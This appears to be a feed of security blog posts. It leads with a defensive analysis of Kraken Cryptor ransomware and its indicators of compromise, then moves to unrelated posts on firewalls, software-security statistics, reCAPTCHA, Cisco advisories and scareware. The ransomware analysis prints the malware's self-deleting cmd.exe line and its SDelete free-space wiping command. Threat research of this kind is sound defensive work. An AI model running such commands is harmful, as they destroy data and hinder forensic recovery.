The Advanced Threat Research team and Recorded Future’s Insikt group analyzed all the forum messages posted by ThisWasKraken. Based on the Russian language used in the posts, we believe ThisWasKraken is neither a native Russian nor English speaker. To make forum posts in Russian, the actor likely uses an automated translation service, suggested by the awkward phrasing indicative of such a service. In contrast, the actor is noticeably more proficient in English, though they make mistakes consistently in both sentence structure and spelling. English spelling errors are also noticeable in the ransom note.

ThisWasKraken is likely part of a team that is not directly involved in the development of the ransomware. The actor’s role is customer facing, through the Jabber account thiswaskraken@exploit[.]im. Communications with ThisWasKraken show that the actor refers all technical issues to the product support team at teamxsupport@protonmail[.]com.


Bitcoin is the only currency the affiliate program uses. Insikt Group identified several wallets associated with the operation. Kraken’s developers appear to have choose BitcoinPenguin, an online gambling site as the primary money laundering conduit. It is very uncommon for criminal actors, and specifically ransomware operators, to bypass traditional cryptocurrency exchangers when laundering stolen funds. One of the decisive factors for the unusual choice was likely BitcoinPenguin’s lack of requiring identity verification by its members, allowing anyone to maintain an anonymous cryptocurrency wallet.

Although in response to regulatory demands cryptocurrency exchangers continue to stiffen their registration rules, online crypto casinos do not have to follow the same know-your-customer guidelines, providing a convenient loophole for all kinds of money launderers.

Bitcoin transactions associated with Kraken analyzed with the Crystal blockchain tool. The parent Bitcoin wallet is 3MsZjBte81dvSukeNHjmEGxKSv6YWZpphH.

Kraken Cryptor at work

The ransomware encrypts data on the disk very quickly and uses external tools, such as SDelete from the Sysinternals suite, to wipe files and make file recovery harder.

The Kraken Cryptor infection scheme.

The ransomware has implemented a user account control (UAC) bypass using the Windows Event Viewer. This bypass technique is used by other malware families and is quite effective for executing malware.

The technique is well explained in an article by blogger enigma0x3.

We analyzed an early subset of Kraken ransomware samples and determined they were still in the testing phase, adding and removing options. The ransomware has implemented a “protection” to delete itself during the infection phase:

“C:\Windows\System32\cmd.exe” /C ping -n 3 > NUL&&del /Q /F /S “C:\Users\Administrator\AppData\Local\Temp\krakentemp0000.exe”

This step is to prevent researchers and endpoint protections from catching the file on an infected machine.

Kraken encrypts user files with a random name and drops the ransom note demanding the victim to pay to recover them. McAfee recommends not paying ransoms because doing so contributes to the development of more ransomware families.

Kraken’s ransom note.

Each file extension is different; this technique is often used by specific ransomware families to bypass endpoint protection systems.

Kraken delivered by the exploit kit bypasses the UAC using Event Viewer, drops a file on the system, and executes it through the UAC bypass method.

The binary delivered by the exploit kit.

The authors of the binary forgot during the compilation of the first versions to delete the PDB reference, revealing that the file has a relationship with Kraken Cryptor:

The early versions contained the following path:


Later versions dropped the PDB path together with the Kraken loader.

Using SysInternals tools

One unique feature of this ransomware family is the use of SDelete. Kraken uses a .bat file to perform certain operations, making file recovery much more challenging:

Kraken downloads SDelete from the Sysinternals website, adds the registry key accepting the EULA to avoid the pop-up, and executes it with the following arguments:

sdelete.exe -c -z C

The SDelete batch file makes file recovery much harder by overwriting all free space on the drive with zeros, deleting the Volume Shadow Copies, disabling the recovery reboot option and finally rebooting the system after 300 seconds.

Netguid comparison

The earlier versions of Kraken were delivered by a loader before it moved to a direct execution method. The loader we examined contained a specific netguid. With this, we found additional samples of the Kraken loader on VirusTotal:

Not only the loader had a specific netguid but the compiled versions of Kraken also shared a netguid, making it possible to continue hunting samples:

Comparing versions

Kraken uses a configuration file in every version to set the variables for the ransomware. This file is easily extracted for additional analysis.

Based on the config file we have discovered nine versions of Kraken:

  • 1.2
  • 1.3
  • 1.5
  • 1.5.2
  • 1.5.3
  • 1.6
  • 2.0
  • 2.0.4
  • 2.0.7

By extracting the config files from all the versions, we built the following overview of features. (The √ means the feature is present.)

All the versions we examined mostly contain the same options, changing only in some of them the antivirtual protection and antiforensic capabilities. The latest version, Kraken 2.0.7, changed its configuration scheme. We will cover that later in this article.

Other differences in Kraken’s config file include the list of countries excluded from encryption. The standouts are Brazil and Syria, which were not named in the original forum advertisement.

Having an exclusion list is a common method of cybercriminals to avoid prosecution. Brazil’s addition to the list in Version 1.5 suggests the involvement of a Brazilian affiliate. The following table shows the exclusion list by country and version. (The √ means the country appears on the list.)

All the Kraken releases have excluded the same countries, except for Brazil, Iran, and Syria.

Regarding Syria: We believe that the Kraken actors have had the same change of heart as the actors behind GandCrab, who recently released decryption keys for Syrian victims after a tweet claimed they had no money to pay the ransoms.


GandCrab’s change of heart regarding Syrian victims.

Version 2.0.7

The most recent version we examined comes with a different configuration scheme:

This release has more options. We expect this malware will be more configurable than other active versions.

APIs and statistics

One of the new features is a public API to track the number of victims:

Public API to track the number of victims. Source: Bleeping Computer.

Another API is a hidden service to track certain statistics:


The Onion URL can be found easily in the binary:

The endpoint and browser Kraken uses is hardcoded in the config file:

Kraken gathers the following information from every infection:

  • Status
  • Operating system
  • Username
  • Hardware ID
  • IP address
  • Country
  • City
  • Language
  • HDCount
  • HDType
  • HDName
  • HDFull
  • HDFree
  • Privilege
  • Operate
  • Beta

Kraken infrastructure

In Versions 1.2 through 2.04 Kraken contacts blasze[.]tk to download additional files. The site has Cloudflare protection to mitigate against DDoS attacks:

The domain is not accessible from many countries:


McAfee coverage

McAfee detects this threat with the following signatures:

  • Artemis!09D3BD874D9A
  • Artemis!475A697872CA
  • Artemis!71F510C40FE5
  • Artemis!99829D5483EF
  • Artemis!CE7606CFDFC0
  • Artemis!F1EE32E471A4
  • RDN/Generic.dx
  • RDN/Generic.tfr
  • RDN/Ransom

Indicators of compromise

Kraken loader hashes

  • 564154a2e3647318ca40a5ffa68d06b1bd40b606cae1d15985e3d15097b512cd
  • 53a28d3d29e655deca6702c98e71a9bd52a5a6de05524234ab362d27bd71a543

Kraken ransomware samples hashes

  • 047de76c965b9cf4a8671185d889438e4b6150326802e87470d20a3390aad304
  • 0b6cd05bee398bac0000e9d7032713ae2de6b85fe1455d6847578e9c5462391f
  • 159b392ec2c052a26d6718848338011a3733c870f4bf324863901ec9fbbbd635
  • 180406f298e45f66e205bdfb2fa3d8f6ead046feb57714698bdc665548bebc95
  • 1d7251ca0b60231a7dbdbb52c28709a6533dcfc4a339f4512955897c7bb1b009
  • 2467d42a4bdf74147ea14d99ef51774fec993eaef3c11694125a3ced09e85256
  • 2b2607c435b76bca395e4ef4e2a1cae13fe0f56cabfc54ee3327a402c4ee6d6f
  • 2f5dec0a8e1da5f23b818d48efb0b9b7065023d67c617a78cd8b14808a79c0dc
  • 469f89209d7d8cc0188654e3734fba13766b6d9723028b4d9a8523100642a28a
  • 4f13652f5ec4455614f222d0c67a05bb01b814d134a42584c3f4aa77adbe03d0
  • 564154a2e3647318ca40a5ffa68d06b1bd40b606cae1d15985e3d15097b512cd
  • 61396539d9392ae08b2c9836dd19a58efb541cf0381ea6fef28637aae63084ed
  • 67db0f639d5f4c021efa9c2b1db3b3bc85b2db920859dbded5fed661cc81282d
  • 713afc925973a421ff9328ff02c80d38575fbadaf27a1db0063b3a83813e8484
  • 7260452e6bd05725074ba92b9dc8734aec12bbf4bbaacd43eea9c8bbe591be27
  • 7747587608db6c10464777bd26e1abf02b858ef0643ad9db8134e0f727c0cd66
  • 7e0ee0e707db426eaf25bd0924631db969bb03dd9b13addffbcc33311a3b9aa7
  • 7fb597d2c8ed8726b9a982b2a84d1c9cc2af65345588d42dd50c8cebeee03dff
  • 85c75ac7af9cac6e2d6253d7df7a0c0eec6bdd71120218caeaf684da65b786be
  • 8a0320f3fee187040b1922c6e8bdf5d6bacf94e01b90d65e0c93f01e2abd1e0e
  • 97ed99508e2fae0866ad0d5c86932b4df2486da59fc2568fb9a7a4ac0ecf414d
  • 9c88c66f44eba049dcf45204315aaf8ba1e660822f9e97aec51b1c305f5fdf14
  • a33dab6d7adb83691bd14c88d7ef47fa0e5417fec691c874e5dd3918f7629215
  • b639e26a0f0354515870ee167ae46fdd9698c2f0d405ad8838e2e024eb282e39
  • cae152c9d91c26c1b052c82642670dfb343ce00004fe0ca5d9ebb4560c64703b
  • d316611df4b9b68d71a04ca517dbd94615a77a87f7a8c270d100ef9729a4e122
  • e39d5f664217bda0d95d126cff58ba707d623a58a750b53c580d447581f15af6
  • f7179fcff00c0ec909b615c34e5a5c145fedf8d9a09ed04376988699be9cc6d5
  • f95e74edc7ca3f09b582a7734ad7a547faeb0ccc9a3370ec58b9a27a1a6fd4a7
  • fea3023f06d0903a05096f1c9fc7113bea50b9923a3c024a14120337531180cd
  • ff556442e2cc274a4a84ab968006350baf9897fffd680312c02825cc53b9f455


  • 83b7ed1a0468394fc9661d07b9ad1b787f5e5a85512ae613f2a04a7442f21587
  • b821eb60f212f58b4525807235f711f11e2ef285630604534c103df74e3da81a
  • 0c4e0359c47a38e55d427894cc0657f2f73136cde9763bbafae37c916cebdd2a


  • f34d5f2d4577ed6d9ceec516c1f5a744


  • thiswaskraken@exploit[.]im

Email addresses found in the binaries and configuration files

  • BM-2cUEkUQXNffBg89VwtZi4twYiMomAFzy6o@bitmessage(.)ch
  • BM-2cWdhn4f5UyMvruDBGs5bK77NsCFALMJkR@bitmessage(.)ch
  • nikolatesla@cock(.)li
  • nikolateslaproton@protonmail(.)com
  • oemfnwdk838r@mailfence(.)com
  • onionhelp@memeware(.)net
  • powerhacker03@hotmail(.)com
  • shfwhr2ddwejwkej@tutanota(.)com
  • shortmangnet@420blaze(.)it
  • teamxsupport@protonmail[.]com

Bitcoin address

  • 3MsZjBte81dvSukeNHjmEGxKSv6YWZpphH

PDBs found in the loader samples

  • C:\Users\Krypton\source\repos\UAC\UAC\obj\\Release\UAC.pdb

Associated Filenames

  • C:\ProgramData\Safe.exe C:\ProgramData\EventLog.txt
  • # How to Decrypt Files.html
  • Kraken.exe
  • Krakenc.exe
  • Release.bat
  • <random>.bat
  • Sdelete.exe
  • Sdelete64.exe
  • <random>.exe
  • CabXXXX.exe
  • TarXXXX.exe
  • SUPERAntiSpywares.exe
  • KrakenCryptor.exe
  • 73a94429b321dfc_QiMAWc2K2W.exe
  • auService.exe
  • file.exe
  • bbdefac4e59207._exe
  • Build.exe

Ransomware demo version


Kraken Unique Key

MITRE ATT&CK™ techniques

  • Data compressed
  • Email collection
  • File and directory
  • File deletion
  • Hooking
  • Kernel modules and extensions
  • Modify registry
  • Process injection
  • Query registry
  • Remote system
  • Security software
  • Service execution
  • System information
  • System time

Yara rules

The McAfee Advanced Threat Research team created Yara rules to detect the Kraken ransomware. The rules are available on our Github repository.


The post Fallout Exploit Kit Releases the Kraken Ransomware on Its Victims appeared first on McAfee Blogs.

Returning to Work? Make it McAfee!

By: Vera, Software Developer

After nine years out of the workplace, I was ready to return to software development. The idea was challenging at first. Would my skills still be valued? Which company would be right for me?

To prepare, I attended seminars and technology deep-dives for people looking to return to software development work. McAfee offered a 12-week, full-time, compensation-based experience program which I was delighted to accept. Designed to help people successfully re-integrate into the workplace after time away, it’s part of McAfee’s strategy to help fill the cybersecurity skills gap and encourage diversity in the technology sector.

Everyone I spoke with at McAfee impressed me as they shared their roles and experiences with the company. I really liked the support, guidance and resources McAfee offered applicants—it gave me the confidence I needed to step back into work. It was clear McAfee would be the perfect starting point for me, my natural first choice when returning to work.

Part of the Team and Learning Fast

Joining McAfee’s Web Security Research software development group in Cork, Ireland, I felt welcome and part of the team from Day One. The culture is inclusive and welcoming, with creativity and new ideas welcomed.

Nine years out of practice and with experience in Java-based software, but none in cybersecurity, I had much to learn. I loved the way everyone in my team was always ready to help and support me.

The team uses the scrum development approach, members collaborating extensively on tasks in two-week sprints. We also use pair programming, working on tasks in pairs.

Scrum and pair programming were both new to me, but I quickly gained a comprehensive understanding of the technologies, techniques and tools as we bounced ideas off one another and addressed challenges together. It was great to develop skills and re-integrate with the workplace so rapidly.

I learned not only about security and McAfee’s solutions, but also about the Linux platforms they run on. I hadn’t done any Unix work since my graduate days, but the team provided support and advice whenever I needed it.

Make the Most of Your Placement

I’d recommend McAfee to anyone looking to return to the workplace. The company has been a great employer and a fantastic way to restart my career. Here are my top five tips for getting the most out of returning to work.

1. Do Your Homework
It’s important to find the right fit for you and your skills. Speak to team members to discover what the company is like, and the products, processes and technologies you’ll be working with.

2. Go Ahead – Apply!
Believe in yourself. You’ve had a good career and responsibilities in the past and your knowledge hasn’t evaporated. You can do even more in the future—I can attest to that. Wherever your next opportunity is, make sure it’s the perfect place to acquire skills and knowledge you may have missed during your time away.

3. Build Your Skills
Expand your expertise through Return to Work seminars and other resources. Review current technologies and thinking. Expand your capabilities and confidence!

4. Extend Your Network
Before and during your time at your placement company, develop connections with relevant people in your team, and in the industry as a whole.

5. Ask Questions
McAfee operates from a foundation of trust and respect. Questions get answers that support progress and development. If you don’t know, ask, either in your team or in your personal development sessions, an integral part of the program.

If you’re apprehensive, don’t worry – that’s normal! I was unsure when I first considered returning to work, especially after such a long break, but now I’m delighted to be back, and even more so to be working with McAfee in a permanent, full-time role.

It’s great to be part of a company that recognizes the capabilities of people who took time out of the workplace, investing time and resources to help us get that all-important foot back in the door. I didn’t know I could do it – now I know I can!

For more stories like this, follow @LifeAtMcAfee on Instagram and on Twitter @McAfee to see what working at McAfee is all about.

Interested in learning more about a career at McAfee? Apply here!

The post Returning to Work? Make it McAfee! appeared first on McAfee Blogs.

What is a firewall? How they work and all about next-generation firewalls

A firewall is a network device that monitors packets going in and out of networks and blocks or allows them according to rules that have been set up to define what traffic is permissible and what traffic isn’t.

There are several types of firewalls that have developed over the years, becoming progressively more complex over time and taking more parameters into consideration when determining whether traffic should or should not be allowed to pass. The most modern are commonly known as next-generation firewalls (NGF) and incorporate many other technologies beyond packet filtering.

Initially placed at the boundaries between trusted and untrusted networks, firewalls are now also deployed to protect internal segments of networks, such as data centers, from other segments of organizations’ networks.

To read this article in full, please click here

State of Software Security Volume 9: Top 5 Takeaways for CISOs

We’ve just released the 9th volume of our State of Software Security report and, as always, it’s a treasure trove of valuable security insights. This year’s report analyzes our scans of more than 2 trillion lines of code, all performed over a 12-month period between April 1, 2017 and April 30, 2018. The data reveals a clear picture of both the security of code organizations are producing today, plus how organizations are working to lower their risk from software vulnerabilities. There are many significant and actionable takeaways, but we’ve pulled out what we consider the top 5 for security professionals.

1. Most code is still rife with vulnerabilities

More than 85 percent of all applications have at least one vulnerability in them; more than 13 percent of applications have at least one very high severity flaw. Clearly, we’ve got work to do. Most organizations are leaving themselves open to attack, and we need to focus on and keep at the application security problem.

2. The usual suspects continue to plague code security

We continue to see the same vulnerabilities pop up in code year after year. The majority of applications this year suffered from information leakage, cryptographic problems, poor code quality, and CRLF Injection. Other heavy-hitters also showed up in statistically significant populations of software. For example, we discovered highly exploitable Cross-Site Scripting flaws in nearly 49 percent of applications, and SQL injection appeared nearly as much as ever, showing up in almost 28 percent of tested software.

Why do these same vulnerabilities continue to emerge year in and year out? Most likely several factors are coming into play, but developer education clearly plays a big role. Veracode recently sponsored the 2017 DevSecOps Global Skills Survey from, and found that less than one in four developers or other IT pros were required to take a single college course on security. Meantime, once developers get on the job, employers aren't advancing their security training options, either. Approximately 68 percent of developers and IT pros say their organizations don't provide them adequate training in application security.

3. It’s taking organizations a long time to address most of their flaws

Finding flaws is one thing; fixing them is another. The true measure of AppSec success is the percentage of found flaws you are remediating or mitigating. This year, we took a detailed look at our data surrounding fix rates, and unearthed some troubling, and some promising, findings.

One week after first discovery, organizations close out only about 15 percent of vulnerabilities. In the first month, that closure reaches just under 30 percent. By the three-month mark, organizations haven't even made it halfway, closing only a little more than 45 percent of all flaws. Overall, one in four vulnerabilities remain open well over a year after first discovery.

Why does that slow fix rate matter? Because cyberattackers move fast. If you’ve discovered a flaw, chances are, the bad guys have too. And the time it takes for attackers to come up with exploits for newly discovered vulnerabilities is measured in hours or days. A big window between find and fix leaves a big security risk.

4. The volume of vulnerabilities means prioritization is king

Clearly, most code contains a significant number of security-related defects. And also clearly, fixing those defects is not a simple or quick task. Therefore, prioritization rules in application security today. And this year’s data shows that, although organizations are prioritizing their flaws, they aren’t always considering all the important variables. Most are prioritizing by severity of flaw, but not considering criticality or exploitability.

This is a big deal when you consider that a low severity information leakage flaw could provide just the right amount of system knowledge an attacker needs to leverage a vulnerability that might otherwise be difficult to exploit. Or a low severity credentials management flaw, which might not be considered very dangerous, could hand the attackers the keys to an account that could be used to attack more serious flaws elsewhere in the software.

The bottom line is that organizations need to start thinking more critically about the factors that impact what they fix first.

5. DevSecOps practices are moving the needle on AppSec

In the good news department, this year’s data shows that customers taking advantage of DevSecOps’ continuous software delivery are closing their vulnerabilities more quickly than the typical organization.

What’s the connection? It stems from the focus on incrementalism in DevOps, which focuses heavily on deploying small, frequent software builds. Doing it this way makes it easier to deliver gradual improvements to all aspects of the application. When organizations embrace DevSecOps, they embed security checks into those ongoing builds, folding in continuous improvement of the application's security posture alongside feature improvement.

Over the past three years, we've examined scanning frequency as a bellwether for the prevalence of DevSecOps adoption in our customer base. Our hypothesis is that the more frequently organizations are scanning their software, the more likely it is that they’re engaging in DevSecOps practices. And this year’s data shows that there is a very strong correlation between how many times in a year an organization scans and how quickly they address their vulnerabilities.

When apps are tested fewer than three times a year, flaws persist more than 3.5x longer than when organization can bump that up to seven to 12 scans annually. Organizations really start to take a bite out of risk when they increase frequency beyond that. Each step up in scan rate results in shorter and shorter flaw persistence intervals. Once organizations are scanning more than 300 times per year, they're able to shorten flaw persistence 11.5x across the intervals compared to applications that are only scanned one to three times per year.

Get the full report

Read the full SoSS report to get all the software security insights and best practices from our scan data. This year’s report contains details on the above points, plus data and insights on specific vulnerability types, the security implications of programming language choice, which industries are more secure than others, and more.

Heimdal Security’s Thor Foresight Enterprise, now available in Microsoft Azure Marketplace and AppSource

Thor Foresight Enterprise, the endpoint security product previously known as Heimdal CORP, is now available in Microsoft Azure Marketplace and AppSource, the platform where customers can reach new-line-business apps for their industry. 

This is a great addition to all Microsoft customers, who can now benefit from a cost-effective and modular endpoint solution that features EDR and other essential threat hunting tools.

Thor Foresight Enterprise is based on unique traffic-based malware detection capabilities that make it possible to map out the critical endpoints in the business environment.      

The company has migrated from Microsoft’s internal catalog for Partners offer to the cloud marketplace, which is an excellent selling tool and a great way to accelerate business growth.

The cloud marketplace can also provide more opportunities for Heimdal Security to expand its security solutions and attract even more customers across different global regions. 

Achieve proactive security and enhance your existing solution with Thor Foresight Enterprise, the Next-Gen Threat Prevention suite for your endpoints. 

Advanced malware is specially created to bypass traditional antivirus detection and can sneak through the gaps, but, with Thor Foresight Enterprise’s proactive, not just reactive approach, your endpoints and networks will remain secure. 

The proprietary DarkLayer Guard feature brings unique traffic filtering to prevent endpoint compromise, block malicious Internet traffic and eliminate the risk of data leakage.   

Using machine learning technology to adapt to evolving threats, the VectorN Detection module will block all incoming and outgoing communications to malicious servers and networks.  

With the powerful X-Ploit Resilience feature, Thor Foresight Enterprise will automatically apply available updates for software apps, eliminating security-holes in third-party software. This way, the vulnerabilities commonly targeted during attacks are eliminated automatically, adding cost-effective resilience to the enterprise. 

With Heimdal Security publishing its solutions in the Microsoft AppSource and Azure Marketplace, we mark an important milestone to be replicated across the partner ecosystem, that contributes to the new era where Microsoft is increasingly becoming the channel for its partners, said Radu Stefan, Microsoft ISV Business Development Manager for Heimdal Security.  

Heimdal Security’s Thor Foresight Enterprise, winner of Anti Malware Solution of the Year at Computing Security Awards 2018, is a revolutionary approach to endpoint security.

Uniquely built to combat next-gen malware, ransomware, and other enterprise threats, it provides both the opportunity to automate vulnerability management and essential threat hunting tools like EDR, while being fully compatible with existing enterprise solutions.

For more information about Heimdal Security or to speak to our specialists about THOR Enterprise, please contact us by emailing sales (at) heimdalsecurity (dot) com or calling +45 7199 9177. 

The post Heimdal Security’s Thor Foresight Enterprise, now available in Microsoft Azure Marketplace and AppSource appeared first on Heimdal Security Blog.

Introducing reCAPTCHA v3: the new way to stop bots

[Cross-posted from the Google Webmaster Central Blog]

Today, we’re excited to introduce reCAPTCHA v3, our newest API that helps you detect abusive traffic on your website without user interaction. Instead of showing a CAPTCHA challenge, reCAPTCHA v3 returns a score so you can choose the most appropriate action for your website.

A frictionless user experience

Over the last decade, reCAPTCHA has continuously evolved its technology. In reCAPTCHA v1, every user was asked to pass a challenge by reading distorted text and typing into a box. To improve both user experience and security, we introduced reCAPTCHA v2 and began to use many other signals to determine whether a request came from a human or bot. This enabled reCAPTCHA challenges to move from a dominant to a secondary role in detecting abuse, letting about half of users pass with a single click. Now with reCAPTCHA v3, we are fundamentally changing how sites can test for human vs. bot activities by returning a score to tell you how suspicious an interaction is and eliminating the need to interrupt users with challenges at all. reCAPTCHA v3 runs adaptive risk analysis in the background to alert you of suspicious traffic while letting your human users enjoy a frictionless experience on your site.

More Accurate Bot Detection with "Actions"

In reCAPTCHA v3, we are introducing a new concept called “Action”—a tag that you can use to define the key steps of your user journey and enable reCAPTCHA to run its risk analysis in context. Since reCAPTCHA v3 doesn't interrupt users, we recommend adding reCAPTCHA v3 to multiple pages. In this way, the reCAPTCHA adaptive risk analysis engine can identify the pattern of attackers more accurately by looking at the activities across different pages on your website. In the reCAPTCHA admin console, you can get a full overview of reCAPTCHA score distribution and a breakdown for the stats of the top 10 actions on your site, to help you identify which exact pages are being targeted by bots and how suspicious the traffic was on those pages.
Fighting bots your way

Another big benefit that you’ll get from reCAPTCHA v3 is the flexibility to prevent spam and abuse in the way that best fits your website. Previously, the reCAPTCHA system mostly decided when and what CAPTCHAs to serve to users, leaving you with limited influence over your website’s user experience. Now, reCAPTCHA v3 will provide you with a score that tells you how suspicious an interaction is. There are three potential ways you can use the score. First, you can set a threshold that determines when a user is let through or when further verification needs to be done, for example, using two-factor authentication and phone verification. Second, you can combine the score with your own signals that reCAPTCHA can’t access—such as user profiles or transaction histories. Third, you can use the reCAPTCHA score as one of the signals to train your machine learning model to fight abuse. By providing you with these new ways to customize the actions that occur for different types of traffic, this new version lets you protect your site against bots and improve your user experience based on your website’s specific needs.

In short, reCAPTCHA v3 helps to protect your sites without user friction and gives you more power to decide what to do in risky situations. As always, we are working every day to stay ahead of attackers and keep the Internet easy and safe to use (except for bots).

Ready to get started with reCAPTCHA v3? Visit our developer site for more details.

Cisco Advanced Malware Protection for Endpoints on Windows DLL Preloading Vulnerability

A vulnerability in the DLL loading component of Cisco Advanced Malware Protection (AMP) for Endpoints on Windows could allow an authenticated, local attacker to disable system scanning services or take other actions to prevent detection of unauthorized intrusions. To exploit this vulnerability, the attacker would need to have administrative credentials on the Windows system.

The vulnerability is due to the improper validation of resources loaded by a system process at run time. An attacker could exploit this vulnerability by crafting a malicious DLL file and placing it in a specific location on the targeted system. A successful exploit could allow the attacker to disable the targeted system's scanning services and ultimately prevent the system from being protected from further intrusion.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:

Security Impact Rating: Medium
CVE: CVE-2018-15452

Cisco Prime File Upload Servlet Path Traversal and Remote Code Execution Vulnerability

A vulnerability in the Cisco Prime File Upload servlet affecting multiple Cisco products could allow a remote attacker to upload arbitrary files to any directory of a vulnerable device and execute those files.

For more information about this vulnerability per Cisco product, see the Details section of this security advisory.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is available at the following link:
Security Impact Rating: Critical
CVE: CVE-2018-0258

DisruptOps: The 4 Phases to Automating Cloud Management

Posted under:

A Security Pro’s Cloud Automation Journey

Catch me at a conference and the odds are you will overhear my saying “cloud security starts with architecture and ends with automation.” I quickly follow with how important it is to adopt a cloud native mindset, even when you’re bogged down with the realities of an ugly lift and shift before the data center contract ends and you turn the lights off. While that’s a nice quip, it doesn’t really capture anything about how I went from a meat and potatoes (firewall and patch management) kind of security pro to an architecture and automation and automation cloud native. Rather than preaching from the mount, I find it more useful to describe my personal journey and my technical realizations along the way. If you’re a security pro, or someone trying to up-skill a security pro for cloud, odds are you will end up on a very similar path.

Read the full post at DisruptOps

- Rich (0) Comments Subscribe to our daily email digest

DAM Not Moving to the Cloud

Posted under: Incite

I have concluded that nobody is using Database Activity Monitoring (DAM) in public Infrastructure or Platform as a Service. I never see it in any of the cloud migrations we assist with. Clients don’t ask about how to deploy it or if they need to close this gap. I do not hear stories, good or bad, about its usage. Not that DAM cannot be used in the cloud, but it is not.

There are certainly some reasons firms invest security time and resources elsewhere. What comes to mind are the following:

  1. PaaS and use of Relational: There are a couple trends which I think come into play. First, while user installed and managed relational databases do happen, there is a definite trend towards adopting RDBMS as a Service. If customers do install their own relational platform, it’s MySQL or MariaDB, for which (so far as I know) there are few monitoring options. Second, for most new software projects, a relational database is a much less likely choice to back applications – more often it’s a NoSQL platform like Mongo (self-managed) or something like Dynamo. This has reduced the total relational footprint.

  2. CI:CD: Automated build and security test pipelines – we see a lot more application and database security testing in development and quality assurance phases, prior to production deployment. Many potential code vulnerabilities and common SQL injection attacks are being spotted and addressed prior to applications being deployed. And there may not be a lot of reconfiguration in production if your installation is defined in software.

  3. Network Security: Between segmentation, firewalls/security groups, and port management you can really lock down the (virtual) network so only the application can talk to the database. Difficult for anyone to end-run around if properly set up.

  4. Database Ownership: Some people cling to the misconception that the database is owned and operated by the cloud provider, so they will take care of database security. Yes, the vendor handles lots of configuration security and patching for you. Certainly much of the value of a DAM platform, namely security assessment and detection of old database versions, is handled elsewhere.

  5. Permission misuse is harder. Most IaaS clouds offer dynamic policy-driven IAM. You can set very fine-grained access controls on database access, so you can block many types of ad hoc and potentially malicious queries.

Maybe none of these reasons? Maybe all the above? I don’t really know. Regardless, DAM has not moved to the cloud. The lack of interest does not provide any real insights as to why, but it is very clear.

I do still want some of DAM’s monitoring functions for cloud migrations, specifically looking for SQL injection attacks – which are still your issue to deal with – as well as looking for credential misuse, such as detecting too much data transfer or scraping. Cloud providers log API access to the database installation, and there are cloud-native ways to perform assessment. But on the monitoring side there are few other options for watching SQL queries.

- Adrian Lane (2) Comments Subscribe to our daily email digest

CTFR – Abuse Certificate Transparency Logs For HTTPS Subdomains

CTFR – Abuse Certificate Transparency Logs For HTTPS Subdomains

CTFR is a Python-based tool to Abuse Certificate Transparency Logs to get subdomains from a HTTPS website in a few seconds.

You missed AXFR technique didn’t you? (Open DNS zone transfers), so how does it work? CTFR does not use dictionary attack or brute-force attacks, it just helps you to abuse Certificate Transparency Logs.

What is Certificate Transparency?

Google’s Certificate Transparency project fixes several structural flaws in the SSL certificate system, which is the main cryptographic system that underlies all HTTPS connections.

Read the rest of CTFR – Abuse Certificate Transparency Logs For HTTPS Subdomains now! Only available at Darknet.

How HTTPS Works – Let’s Establish a Secure Connection

The need to use HTTPS on your website has been spearheaded by Google for years (since 2014), and in 2018 we saw massive improvements as more of the web became...

Read More

The post How HTTPS Works – Let’s Establish a Secure Connection appeared first on PerezBox.

Ghouls of the Internet: Protecting Your Family from Scareware and Ransomware

scareware and ransomwareIt’s the middle of a workday. While researching a project, a random ad pops up on your computer screen alerting you of a virus. The scary-looking, flashing warning tells you to download an “anti-virus software” immediately. Impulsively, you do just that and download either the free or the $9.99 to get the critical download.

But here’s the catch: There’s no virus, no download needed, you’ve lost your money, and worse, you’ve shared your credit card number with a crook. Worse still, your computer screen is now frozen or sluggish as your new download (disguised malware) collects the data housed on your laptop and funnels it to a third party to be used or sold on the dark web.

Dreadful Downloads

This scenario is called scareware — a form of malware that scares users into fictitious downloads designed to gain access to your data. Scareware bombards you with flashing warnings to purchase a bogus commercial firewall, computer cleaning software, or anti-virus software. Cybercriminals are smart and package the suggested download in a way that mimics legitimate security software to dupe consumers. Don’t feel bad, a lot of intelligent people fall for scareware every day.

Sadly, a more sinister cousin to scareware is ransomware, which can unleash serious digital mayhem into your personal life or business. Ransomware scenarios vary and happen to more people than you may think.

Malicious Mayhem

What is Ransomware? Ransomware is a form of malicious software (also called malware) that is a lot more complicated than typical malware. A ransomware infection often starts with a computer user clicking on what looks like a standard email attachment only that attachment unlocks malware that will encrypt or lock computer files.

scareware and ransomware

A ransomware attack can cause incredible emotional and financial distress for individuals, businesses, or large companies or organizations. Criminals hold data ransom and demand a fee to release your files back to you. Many people think they have no choice but to pay the demanded fee. Ransomware can be large-scale such as the City of Atlanta, which is considered the largest, most expensive cyber disruption in city government to date or the WannaCry attack last year that affected some 200,000+ computers worldwide. Ransomware attacks can be aimed at any number of data-heavy targets such as labs, municipalities, banks, law firms, and hospitals.

Criminals can also get very personal with ransomware threats. Some reports of ransomware include teens and older adults receiving emails that falsely accuse them or browsing illegal websites. The notice demands payment or else the user will be exposed to everyone in his or her contact list. Many of these threats go unreported because victims are too embarrassed to do anything.

Digital Terrorists

According to the Cisco 2017 Annual Cybersecurity Report, ransomware is growing at a yearly rate of 350% and, according to Microsoft,  accounted for roughly $325 million in damages in 2015. Most security experts advise against paying any ransoms since paying the ransom is no guarantee you’ll get your files back and may encourage a second attack.

Cybercriminals are fulltime digital terrorists and know that a majority of people know little or nothing about their schemes. And, unfortunately, as long as our devices are connected to a network, our data is vulnerable. But rather than living anxiously about the possibility of a scareware or ransomware attack, your family can take steps to reduce the threat.

Tips to keep your family’s data secure:

Talk about it. Education is first, and action follows. So, share information on the realities of scareware and ransomware with your family. Just discussing the threats that exist, sharing resources, and keeping the issue of cybercrime in the conversation helps everyone be more aware and ready to make wise decisions online.

Back up everything! A cybercriminal’s primary goal is to get his or her hands on your data, and either use it or sell it on the dark web (scareware) or access it and lock it down for a price (ransomware). So, back up your data every chance you get on an external hard drive or in the cloud. If a ransomware attack hits your family, you may panic about your family photos, original art, writing, or music, and other valuable content. While backing up data helps you retrieve and restore files lost in potential malware attack, it won’t keep someone from stealing what’s on your laptop.scareware and ransomware

Be careful with each click. By being aware and mindful of the links and attachments you’re clicking on can reduce your chances of malware attacks in general. However, crooks are getting sophisticated and linking ransomware to emails from seemingly friendly sources. So, if you get an unexpected email with an attachment or random link from a friend or colleague, pause before opening the email attachment. Only click on emails from a trusted source. 

